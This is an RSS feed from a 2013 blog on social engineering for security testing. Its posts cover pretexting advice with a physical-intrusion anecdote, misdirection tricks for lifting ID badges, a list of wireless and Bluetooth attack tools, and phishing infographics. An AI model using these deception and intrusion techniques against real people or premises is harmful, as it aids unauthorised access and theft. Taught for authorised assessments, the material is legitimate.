<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Subliminal Hacking</title>
	<atom:link href="http://www.subliminalhacking.net/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.subliminalhacking.net</link>
	<description>The Art and Science of Social Engineering</description>
	<lastBuildDate>Wed, 22 May 2013 18:41:26 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<item>
		<title>Derren Brown&#8217;s Infamous Tour &#8230; Awesome Sauce!</title>
		<link>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/</link>
		<comments>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/#comments</comments>
		<pubDate>Wed, 22 May 2013 11:37:22 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Review]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Andy Nyman]]></category>
		<category><![CDATA[breaking]]></category>
		<category><![CDATA[Cold Reading]]></category>
		<category><![CDATA[Derren Brown]]></category>
		<category><![CDATA[Hypnosis]]></category>
		<category><![CDATA[Infamous]]></category>
		<category><![CDATA[Mentalism]]></category>
		<category><![CDATA[New Alexandra Theatre Birmingham]]></category>
		<category><![CDATA[Psychic]]></category>
		<category><![CDATA[review]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1715</guid>
		<description><![CDATA[Last night (21st May 2013) was that special time again when I headed off to see a new offering from the master that is Derren Brown, this time wrapped up in his new stage show Infamous at the New Alexandra Theatre Birmingham. I should say two things before I continue, if you know me or [...]]]></description>
				<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/05/DB-Infamous.jpg"><img class="aligncenter  wp-image-1716" alt="DB-Infamous" src="http://www.subliminalhacking.net/wp-content/uploads/2013/05/DB-Infamous.jpg" width="256" height="363" /></a></p>
<p style="text-align: left;">Last night (21st May 2013) was that special time again when I headed off to see a new offering from the master that is Derren Brown, this time wrapped up in his new stage show Infamous at the New Alexandra Theatre Birmingham. I should say two things before I continue, if you know me or you read this blog already you will know I am a little biased towards Mr Brown, I am a big fan of pretty much all he has done. Also as with all his shows, he does request no specific spoilers so everyone gets the full viewing experience.</p>
<p style="text-align: left;">Now I have seen everything Derren has done, a combination of TV and in person. I love it all, the new stuff we see on TV lately is very different to the older stuff like Mind Control, but different isn&#8217;t bad, it&#8217;s well different. I think it aims to expose the viewer to different perspectives, as well as giving the people that participate a potentially life changing experience. However seeing Derren in anything live for me is really where you see him in top form, and Infamous really didn&#8217;t disappoint, and as much as I loved Enigma and Svengali I really appreciated Andy Nyman being back on the scene. I guess with that it&#8217;s no surprise I thought Infamous&#8217;s feel and production was more like the older shows &#8220;Something Wicked This Way Comes&#8221; and &#8220;An Evening of Wonders&#8221;, and for me this is much more how I like it. Essentially it&#8217;s Derren properly wowing us with himself, less props more mental mojo and dexterity.</p>
<p style="text-align: left;">This entire performance felt a lot more personal, with Derren sharing what seemed some personal and emotional thoughts and experiences as well as some very motivational take aways, all very inspiring indeed. The set background was very impressive, in some ways it was simplistic but really added to the effect and feel of the show. This show also included a lot more audience participation than the last few which is awesome, and as I mentioned before you really get (in my mind) more first hand exposure to the processes and techniques that first made everyone aware of Derren&#8217;s skills all those years ago, as well as those opinions and experiences he has brought to TV of late. What you are constantly reminded of every time you see Derren is how much of a professional he is, his ability to manage the audience, perfection in his presentation and skills, and also how personable he can be, but also a great sense of humour.</p>
<p style="text-align: left;">I know it&#8217;s a bit vague (aka no spoilers), but when you go see this show you will not be disappointed. So many jaw dropping moments, and even if you have an understanding of the techniques Derren employs (Hypnosis, Sleight of Hand, Mentalism, Pseudo Psychic stuffs), I guarantee there will be many times where you think to yourself, how the hell did he just achieve that. Save the tracking back until later though, or you will miss more opportunities to be amazed. As always I left the show inspired even more to continue to develop both my skills, but also myself and others.</p>
<p style="text-align: left;">Enjoy the show, and as always leave comments.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/05/22/derren-browns-infamous-tour-awesome-sauce/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Longlining &#8230; The 2013 Social Engineering Threat</title>
		<link>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/</link>
		<comments>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/#comments</comments>
		<pubDate>Fri, 10 May 2013 12:23:01 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[longlining]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[proofpoint]]></category>
		<category><![CDATA[spotlight]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1703</guid>
		<description><![CDATA[I came across another great InfoGraph today from proofpoint on &#8220;Longlining&#8221; and I thought I would share it. This approach uses more targeted phishing emails along with various techniques in an attempt to avoid detection. ]]></description>
				<content:encoded><![CDATA[<p style="text-align: left;">I came across another great InfoGraph today from proofpoint on &#8220;Longlining&#8221; and I thought I would share it. This approach uses more targeted phishing emails along with various techniques in an attempt to avoid detection. <a href="http://www.subliminalhacking.net/wp-content/uploads/2013/05/Longlining-Infographic.jpg"><br />
<img class="aligncenter  wp-image-1707" alt="Longlining-Infographic" src="http://www.subliminalhacking.net/wp-content/uploads/2013/05/Longlining-Infographic.jpg" width="640" height="2566" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/05/10/longlining-the-2013-social-engineering-threat/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Whats my motivation darling? &#8230; The Pretext</title>
		<link>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/</link>
		<comments>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/#comments</comments>
		<pubDate>Sun, 24 Mar 2013 12:16:56 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Manipulation]]></category>
		<category><![CDATA[Misdirection]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[get in character]]></category>
		<category><![CDATA[Motivation]]></category>
		<category><![CDATA[Pretext]]></category>
		<category><![CDATA[pretexting]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1679</guid>
		<description><![CDATA[There are many essential skills required to be successful at social engineering, and one we have mentioned before but never really gone into is Pretexting. The easiest way I find to describe a pretext is to consider the motivation for an actor. When you see interviews with actors about their latest film and how they [...]]]></description>
				<content:encoded><![CDATA[<p>There are many essential skills required to be successful at social engineering, and one we have mentioned before but never really gone into is Pretexting. The easiest way I find to describe a pretext is to consider the motivation for an actor. When you see interviews with actors about their latest film and how they got into character, you will hear them talking about how they met with real life examples of their character, visited places they worked, stayed, etc. All of this is to enable them to get into the mindset of the role they are playing: what was their background, what did they experience in their life, what was their personality, their approach in life and what made them into the person they are today. They will also understand how they literally walk and talk, the body language, how they present themselves (clothes, style, attitude). This is what pretext is for a social engineer: reaching a position to live, breathe and feel in character for the position they will be looking to imply in the context of the social engineering engagement they are due to perform.</p>
<p><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/03/thespian.jpg"><img class="aligncenter size-medium wp-image-1680" alt="thespian" src="http://www.subliminalhacking.net/wp-content/uploads/2013/03/thespian-300x200.jpg" width="300" height="200" /></a></p>
<p>&nbsp;</p>
<p>With all the power of the Interwebs understanding the individual or type of character is greatly reduced in effort, but to be successful it isn&#8217;t just a case of reading a bio and job done. It really is important to take time to fully understand and visualise what it would be like for you to BE this character, as if you are to pull off the act successfully in a challenging situation you don&#8217;t want to be pretending, you want to BE. This might seem odd, as of course you are you, and you are there on a Pentest or some other form of activity, but if you think like this and someone really challenges you on why you are doing something, you will get flustered, become unstuck, spill the beans and hand over your get out of jail free authorisation letter. However if you are acting out against your pretext the result would be different, you are not the Pentester, you are Bob the Head of Finance for ACME Inc, and when Bob is challenged by someone at reception, or any member of staff, he is not fazed, as he would hope staff check people they are not familiar with, and would support it, but be very clear he is in a position of authority and should be treated accordingly.</p>
<p><em>A nice example of this is what happened to me on a physical engagement last year. The gig was going well, we had gained access to all but one of the objectives and were hunting around the facility to find its location. During the hunt we were approached and questioned by a facilities member of staff, they kindly asked what we were doing and what we were looking for. So I asked them where the location we were looking for was <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  (You don&#8217;t ask you don&#8217;t get). As this was a semi sensitive location they were unsure and this was obvious, so I confirmed without his need to ask why we needed to go there and what we had been doing. All of this information was part of our devised cover story and formed some background of the pretext. Then he decided it would be best to call the facilities manager. OH SHIT <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  So now we crap ourselves and hand over the letter, gig is up?? Nope. I encouraged him to call the guy, in fact it would be good to meet him anyway, so he continued his call &#8230; &#8220;I have a couple of guys here who say they are X + Y and they need to go to Z&#8221;, few pauses, &#8220;OK I will take them there and you can meet us there? Sure. Sound good&#8221;. You might think this is crazy, but remember why wouldn&#8217;t we want to meet the manager if it was legitimate? Anyway, so the facilities guy who was very busy when we encountered him started to escort us through the building to our final objective and a meeting with the facilities manager. Cut a long story short, I had a good chat with him en route, shared some empathy around the mountain of work he seemed to have, and when we arrived at our location and the manager wasn&#8217;t there, suggested we could wait here whilst he gets back to his work.
He wasn&#8217;t sure, I agreed it might be best to wait with us, but I would understand if he needed to get back to it, and he did <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  We waited about 2 mins, then went walkabout now knowing where our final objective was for later.</em></p>
<p>What I am trying to confirm above is that if you have done your homework, and are fully acting out on your pretext you can push the boundaries further until they crack. Sure you might eventually get untangled and rumbled but it gives you a lot more wiggle room. You will probably be running on adrenalin at this stage, and in the mental oh shit, oh shit loop, but if you have your motivation right you just need to rely on your skills. Essentially you are misdirecting from the issue at hand, and manipulating the situation to give yourself some options.</p>
<p>Below is my tip list on putting together your pretext, but regardless have fun with it and experiment.</p>
<ul>
<li><span style="line-height: 13px;">Keep it simple. The more complex you make it, the more stress you put yourself under, and this will make things less fluid.</span></li>
<li>Room to maneuver. Have multiple paths you can take with your pretext. If you have kids, who are they, interests, etc.</li>
<li>Don&#8217;t reinvent the wheel. Regardless of your age you have a lot of life experience, include some of yourself in your pretext.</li>
<li>BIG BECAUSE. Remember to have a logical reason for what you are doing. Having a reason goes a long way to implied acceptance.</li>
<li>Visualise. Mentally go through possible character interactions. How will you respond, where will that lead.</li>
<li>Accents. If you can&#8217;t do them, DON&#8217;T. If your accent doesn&#8217;t match your pretext, change it, or have justifiable reasoning why it doesn&#8217;t.</li>
<li>Accessorise. If your character should have certain accessories or props, have them with you. It completes the picture and reduces doubt.</li>
<li>Ad-lib. Be prepared to go off script if things get messy. However keep in context and reference to your pretext.</li>
<li>Context is key. Use your OSINT to help formulate your pretext. If the company doesn&#8217;t have water coolers, being the water cooler guy is FAIL.</li>
</ul>
<p>I hope this information was of some interest, and will help you in your next authorised social engineering assessment.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/03/24/whats-my-motivation-darling-the-pretext/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Why Social Engineering Works &#8230; Infograph by Veracode</title>
		<link>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/</link>
		<comments>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/#comments</comments>
		<pubDate>Mon, 11 Mar 2013 23:56:22 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Infograph]]></category>
		<category><![CDATA[spotlight]]></category>
		<category><![CDATA[Veracode]]></category>
		<category><![CDATA[Why Social Engineering Works]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1668</guid>
		<description><![CDATA[I came across this great infograph from Veracode today on &#8220;Why Social Engineering Works&#8221;. Wish I had the time and the skill to put these infographs together, but here you go. (Its a relatively large file so please be patient while it loads) &#160;]]></description>
				<content:encoded><![CDATA[<p>I came across this great infograph from Veracode today on &#8220;Why Social Engineering Works&#8221;. Wish I had the time and the skill to put these infographs together, but here you go. <em>(It&#8217;s a relatively large file so please be patient while it loads)</em></p>
<p>&nbsp;</p>
<p style="text-align: center;"><a href="http://www.subliminalhacking.net/wp-content/uploads/2013/03/socialengineering-diagram.png"><img class="aligncenter  wp-image-1669" alt="socialengineering-diagram" src="http://www.subliminalhacking.net/wp-content/uploads/2013/03/socialengineering-diagram.png" width="585" height="2720" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/03/11/why-social-engineering-works-infograph-by-veracode/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wireless Attack and Audit Tools &#8230; Recommendations List</title>
		<link>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/</link>
		<comments>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/#comments</comments>
		<pubDate>Thu, 07 Feb 2013 10:09:13 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Aircrack-NG]]></category>
		<category><![CDATA[aireplay-ng]]></category>
		<category><![CDATA[airodump-ng]]></category>
		<category><![CDATA[AirPCAP]]></category>
		<category><![CDATA[Airpwn]]></category>
		<category><![CDATA[Alfa AWUS036H]]></category>
		<category><![CDATA[ASLeap]]></category>
		<category><![CDATA[AVR RZ Raven]]></category>
		<category><![CDATA[BackTrack 5 Wireless Penetration Testing Guude]]></category>
		<category><![CDATA[BlueBugger]]></category>
		<category><![CDATA[BlueSnarfer]]></category>
		<category><![CDATA[bluetooth]]></category>
		<category><![CDATA[Carwhisperer]]></category>
		<category><![CDATA[Cinceptronic CBT200U2]]></category>
		<category><![CDATA[CoWPAtty]]></category>
		<category><![CDATA[Edimax EW-7811Un]]></category>
		<category><![CDATA[Elcomsoft Wireless Security Auditor]]></category>
		<category><![CDATA[Ettercap]]></category>
		<category><![CDATA[FreeRadius]]></category>
		<category><![CDATA[GlobalStat BU 353 GPS]]></category>
		<category><![CDATA[Immunity Silica]]></category>
		<category><![CDATA[inSSIDer]]></category>
		<category><![CDATA[Karmetasploit]]></category>
		<category><![CDATA[KillerBee]]></category>
		<category><![CDATA[KisBee]]></category>
		<category><![CDATA[kismet]]></category>
		<category><![CDATA[Linksys USBBT100]]></category>
		<category><![CDATA[MSI MS-6967]]></category>
		<category><![CDATA[packetforge-ng]]></category>
		<category><![CDATA[Proxmark3]]></category>
		<category><![CDATA[Rainbow Tables]]></category>
		<category><![CDATA[RFID]]></category>
		<category><![CDATA[Ubertooth One]]></category>
		<category><![CDATA[Wardriving]]></category>
		<category><![CDATA[WiFi Pineapple]]></category>
		<category><![CDATA[wireless attack tools]]></category>
		<category><![CDATA[wireless audits]]></category>
		<category><![CDATA[wireless hacking]]></category>
		<category><![CDATA[Wireless Hacking Exposed]]></category>
		<category><![CDATA[wireless tools]]></category>
		<category><![CDATA[Zigbee]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1619</guid>
		<description><![CDATA[Wireless recon and exploitation may not be one of the techniques that first jumps to mind when you think of Social Engineering, but its a valid attack vector for both the on premises recon and attacks (direct to the wireless infrastructure) but also clientside (attacking the host on premise and in the airport lounge). With [...]]]></description>
				<content:encoded><![CDATA[<p>Wireless recon and exploitation may not be one of the techniques that first jumps to mind when you think of Social Engineering, but it&#8217;s a valid attack vector both for on premises recon and attacks (direct to the wireless infrastructure) and for clientside attacks (attacking the host on premise and in the airport lounge).</p>
<p>With this in mind and the ever increasing usage of wireless technologies and a couple of requests from people I thought it would be a great idea to put together another recommendations list of tools, hardware and resources for anyone looking to get into wireless auditing or adding wireless attack vectors to their current attack methodology (similar to my <a title="OSINT Tools" href="http://www.subliminalhacking.net/2012/12/27/osint-tools-recommendations-list/" target="_blank">OSINT  Tools Recommendations List</a>).</p>
<p>This page will be maintained and grown over time. If you know of a good tool, decent hardware or resource, please get in touch for consideration on adding it to this list.</p>
<h4>Wireless Networks</h4>
<ul>
<li><a href="http://www.aircrack-ng.org/" target="_blank">Aircrack-NG</a> - Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.</li>
<li><a href="http://www.kismetwireless.net/" target="_blank">Kismet </a>- Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.</li>
<li><a href="http://www.metageek.net/products/inssider/" target="_blank">inSSIDer</a> - inSSIDer displays all the Wi-Fi networks around you – including security information, the strength of the network, and broadcasting channel.</li>
<li><a href="http://airpwn.sourceforge.net/Airpwn.html" target="_blank">Airpwn</a> - Airpwn listens to incoming wireless packets, and if the data matches a pattern specified in the config files, custom content is injected &#8220;spoofed&#8221;.</li>
<li><a href="http://www.willhackforsushi.com/Cowpatty.html" target="_blank">CoWPAtty</a> &#8211; WPA Dictionary Attacking Tool.</li>
<li><a href="http://ettercap.github.com/ettercap/" target="_blank">Ettercap</a> &#8211; Not wireless specific but a handy tool for Man In The Middle Attacking.</li>
<li><a href="http://www.willhackforsushi.com/Asleap.html" target="_blank">ASLeap</a> &#8211; Tool for exploiting Cisco LEAP authentication.</li>
<li><a href="http://www.willhackforsushi.com/FreeRADIUS-WPE.html" target="_blank">FreeRadius</a> - A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities</li>
<li><a href="http://dev.metasploit.com/redmine/projects/framework/wiki/Karmetasploit" target="_blank">Karmetasploit</a> - Karmetasploit is a great function within Metasploit, allowing you to fake access points, capture passwords, harvest data, and conduct browser attacks against clients.</li>
<li><a href="http://www.elcomsoft.co.uk/ewsa.html" target="_blank">EWSA</a> &#8211; Elcomsoft Wireless Security Auditor allows GPU power to be used to crack WPA/WPA2 password enabled networks.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.co.uk/Alfa-AWUS036H-Upgraded-Wireless-Long-Rang/dp/B000WXSO76/ref=sr_1_2?ie=UTF8&amp;qid=1360153800&amp;sr=8-2" target="_blank">Alfa AWUS036H</a> - 1000mW 1W 802.11b/g High Gain USB Wireless Long-Rang WiFi network Adapter with 5dBi Antenna.</span></li>
<li><a href="http://www.amazon.co.uk/GlobalSat-BU-353-WaterProof-Receiver-SiRF/dp/B000PKX2KA/ref=sr_1_2?ie=UTF8&amp;qid=1360156335&amp;sr=8-2" target="_blank">GlobalStat BU353 GPS</a> &#8211; USB GPS Dongle compatible with Kismet. Ideal war mapping out wireless coverage.</li>
<li><a href="http://hakshop.myshopify.com/products/wifi-pineapple" target="_blank">WiFi Pineapple</a> - Awesome one box wonder of WiFi hacking goodness.</li>
<li><a href="http://www.immunityinc.com/products-silica.shtml" target="_blank">Immunity Silica</a> - Automated wireless auditing tool.</li>
<li><a href="http://www.riverbed.com/uk/products/cascade/wireshark_enhancements/airpcap.php" target="_blank">AirPCAP</a> - Wireless Packet Capture Solution.</li>
<li><a href="http://www.amazon.co.uk/Edimax-EW-7811UN-Wireless-802-11b-150Mbps/dp/B003MTTJOY/ref=sr_1_1?ie=UTF8&amp;qid=1360973318&amp;sr=8-1" target="_blank">Edimax EW-7811Un</a> &#8211; Nano USB Wifi Adapter that supports injection.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.com/gp/product/1849515581/ref=as_li_qf_sp_asin_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=1849515581&amp;linkCode=as2&amp;tag=sublimhackin-20">BackTrack 5 Wireless Penetration Testing Beginner&#8217;s Guide</a><img style="border: none !important; margin: 0px !important;" alt="" src="http://www.assoc-amazon.com/e/ir?t=sublimhackin-20&amp;l=as2&amp;o=1&amp;a=1849515581" width="1" height="1" border="0" /> - Great book on Wireless Pentesting with BackTrack by Vivek Ramachandran.<br />
</span></li>
<li><span style="line-height: 13px;"><a href="http://www.amazon.com/gp/product/0071666613/ref=as_li_qf_sp_asin_tl?ie=UTF8&amp;camp=1789&amp;creative=9325&amp;creativeASIN=0071666613&amp;linkCode=as2&amp;tag=sublimhackin-20">Hacking Exposed Wireless, Second Edition</a><img style="border: none !important; margin: 0px !important;" alt="" src="http://www.assoc-amazon.com/e/ir?t=sublimhackin-20&amp;l=as2&amp;o=1&amp;a=0071666613" width="1" height="1" border="0" /> &#8211; The Hacking Exposed books are well known, and this one features the sushi king Josh Wright.</span></li>
<li><a href="http://blog.securityactive.co.uk/2009/07/17/wardriving-with-kismet-newcore-and-backtrack-4/" target="_blank">Wardriving with Kismet</a> &#8211; Old blog post I did on WarDriving with Kismet, still a handy reference.</li>
<li><a href="http://www.renderlab.net/projects/WPA-tables/" target="_blank">Church of Wifi </a>- WPA PSK Rainbow Tables</li>
</ul>
<h4>Bluetooth</h4>
<ul>
<li><a href="http://www.alighieri.org/tools/bluesnarfer.tar.gz" target="_blank">BlueSnarfer</a> &#8211;  Provides the ability to send and receive AT Commands from GSM extensions.</li>
<li><a href="http://packetlife.net/armory/bluebugger/" target="_blank">BlueBugger </a>- Bluetooth tool to access phonebook, messages and other AT commands from supported GSM devices.</li>
<li><a href="http://trifinite.org/trifinite_stuff_carwhisperer.html" target="_blank">CarWhisperer</a> &#8211; Provides the ability to connect to BlueTooth devices with a class of handsfree and uses default passkeys to connect.</li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.amazon.co.uk/Linksys-USBBT100-Bluetooth-USB-Adapter/dp/B0002AGEW6" target="_blank">Linksys Usbbt100</a> &#8211; Great moddable  BlueTooth dongle for hacking, not so easy to get hold of.<br />
</span></li>
<li>MSI MS-6967 &#8211; Another BlueTooth dongle that supports modding for external antenna.</li>
<li>Conceptronic CBT200U2 - Another BlueTooth dongle that supports modding for external antenna.</li>
<li><a href="http://ubertooth.sourceforge.net/" target="_blank">Ubertooth One</a> &#8211; The goto hardware for Bluetooth hacking and experimentation.</li>
</ul>
<h4>Zigbee</h4>
<ul>
<li><span style="line-height: 13px;"><a href="http://code.google.com/p/killerbee/" target="_blank">KillerBee</a> &#8211;  KillerBee is a Python based framework and tool set for exploring and exploiting the security of ZigBee and IEEE 802.15.4 networks.</span></li>
</ul>
<ul>
<li><span style="line-height: 13px;"><a href="http://www.kismetwireless.net/kisbee/" target="_blank">KisBee </a>- Kisbee is a project to create a small, battery powered, open source hardware device for capturing 802.15.4 (aka Zigbee).</span></li>
<li>AVR RZ Raven &#8211; Zigbee USB Wireless that works with the KillerBee Framework.</li>
</ul>
<h4>RFID</h4>
<ul>
<li><span style="line-height: 13px;"><a href="http://proxmark3.com/" target="_blank">Proxmark3</a> - The Proxmark III is the most powerful and versatile open source device currently available for performing RFID research.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/02/07/wireless-attack-and-audit-tools-recommendations-list/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Attention Manipulation Techniques &#8230; Natural Buffer Overflows</title>
		<link>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/</link>
		<comments>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/#comments</comments>
		<pubDate>Tue, 05 Feb 2013 15:00:49 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Manipulation]]></category>
		<category><![CDATA[Misdirection]]></category>
		<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Attention Manipulation Techniques]]></category>
		<category><![CDATA[Bottom Up Attention]]></category>
		<category><![CDATA[Natural Buffer Overflows]]></category>
		<category><![CDATA[Prefrontal Cortex]]></category>
		<category><![CDATA[Sensory Cortices]]></category>
		<category><![CDATA[Top Down Attention]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1392</guid>
		<description><![CDATA[A key part of being a Social Engineer is being able to create yourself windows of opportunity. These may be to distract peoples attention whilst you slip past a door, pull some keys from a key cabinet, acquire an access card from a pocket and many more. Of course to achieve any of these things you can [...]]]></description>
				<content:encoded><![CDATA[<p>A key part of being a Social Engineer is being able to create yourself windows of opportunity. These may be to distract people&#8217;s attention whilst you slip past a door, pull some keys from a key cabinet, acquire an access card from a pocket and many more. Of course to achieve any of these things you can simply give it a go, cross your fingers and do your thing. Sure you might get lucky, but this is a more opportunistic approach. I would recommend you pop off your social hat for a moment and don your engineering helmet. What do I mean? Well, look to understand how we can manipulate someone&#8217;s attention, from both the science and artistic perspective.</p>
<p>What I am about to say may seem obvious, and in many ways it is, but when you are in the moment that awesome brain of yours goes primal and you forget the simple things unless it is something you have imprinted via established learning and muscle memory, i.e. doing it lots and lots, so you don&#8217;t need to think about it. Remember when you were learning to drive, the practice of approaching a roundabout, signalling, turning and changing gear resulted in a stalled vehicle and horns blaring all over the shop. This crap is impossible you thought. Established learning now means you can do all of the above, speak on your mobile, check yourself out in the rearview mirror, smoke a cigarette whilst carefully resting a hot coffee between your legs.</p>
<p style="text-align: center;"><img class="aligncenter  wp-image-1403" alt="squirel" src="http://www.subliminalhacking.net/wp-content/uploads/2013/01/squirel.jpg" width="281" height="281" /></p>
<p>I digress <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  So this information is built from books I have read, but more importantly from actually doing different things to prove they work and establish them as part of a built-in skillset. Obviously on-the-job Social Engineering gigs give you this, but they are not always the best time to try them out, which is where my other pastimes of mentalism, hypnosis and more recently pickpocketing (all in the frame of entertainment) help and provide opportunity for me to learn and develop these skills.</p>
<p>People can be manipulated as there are two types of attention processed by the brain. There is &#8216;Top Down Attention&#8217; and &#8216;Bottom Up Attention&#8217;.</p>
<ul>
<li>Top Down Attention is classified as decision making attention. If I ask you to look down at your hands now, you are consciously making a decision to perform that action. This action uses the Prefrontal Cortex which is highly developed in humans for complex decision making.</li>
<li>Bottom Up Attention is when something grabs the focus of your attention. A simple example of this is when someone calls your name, or a phone rings with your ringtone. You are drawn automatically to investigate and verify if you are the focus. This action uses a more primitive part of the brain known as the Sensory Cortices. In these regions of the brain unexpected stimuli are quickly routed to grab your focus, presumably to stop us being eaten by a lion back in the day <img src='http://www.subliminalhacking.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </li>
</ul>
<p>Combine this with the fact that our brains really do have limited focus, such as only being able to remember 5 or so concurrent activities at a time, and we create a situation that, even if you are aware of how it's done, you just can't protect against, as it's just how our brain functions. Combine this with congruency to build up some yes sets.</p>
<p>So next time you are trying to misdirect someone's attention consider the above. When you ask someone for the time (Top Down Attention) drop a silver coin on the floor to roll away (Bottom Up Attention), creating a small window of opportunity that you can exploit to possibly gain access to that ID Badge, or view the combination codes written on that pad.</p>
<p>Happy Social Engineering!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.subliminalhacking.net/2013/02/05/attention-manipulation-techniques-natural-buffer-overflows/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Facebook Graph &#8230; Social Engineering OSINT gets Graphical</title>
		<link>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/</link>
		<comments>http://www.subliminalhacking.net/2013/01/17/facebook-graph-social-engineering-osint-gets-graphical/#comments</comments>
		<pubDate>Thu, 17 Jan 2013 20:21:34 +0000</pubDate>
		<dc:creator>Dale Pearson</dc:creator>
				<category><![CDATA[Social Engineering]]></category>
		<category><![CDATA[Subliminal Hacking]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Apps My Friends Use]]></category>
		<category><![CDATA[Current Cities Of My Friends]]></category>
		<category><![CDATA[Facebook Graph]]></category>
		<category><![CDATA[Finding Relevant Info]]></category>
		<category><![CDATA[Games My Friends Play]]></category>
		<category><![CDATA[Groups My Friends Are In]]></category>
		<category><![CDATA[Microsoft Bing]]></category>
		<category><![CDATA[Movies My Friends Like]]></category>
		<category><![CDATA[Music My Friends Like]]></category>
		<category><![CDATA[nds]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[Photos I have Liked]]></category>
		<category><![CDATA[Photos of My Friends]]></category>
		<category><![CDATA[Restaurants Nearby]]></category>

		<guid isPermaLink="false">http://www.subliminalhacking.net/?p=1490</guid>
		<description><![CDATA[So Facebook currently have a new offering in beta form, and it&#8217;s called &#8216;Facebook Graph&#8217;. Woopie Doo I hear you cry, but it may actually be something to sauce up your Social Networking OSINT a little more if you are a social engineer. The aim of Facebook Graph as far as I can tell is [...]]]></description>
				<content:encoded><![CDATA[<p>So Facebook currently have a new offering in beta form, and it&#8217;s called &#8216;Facebook Graph&#8217;. Woopie Doo I hear you cry, but it may actually be something to sauce up your Social Networking OSINT a little more if you are a social engineer.</p>
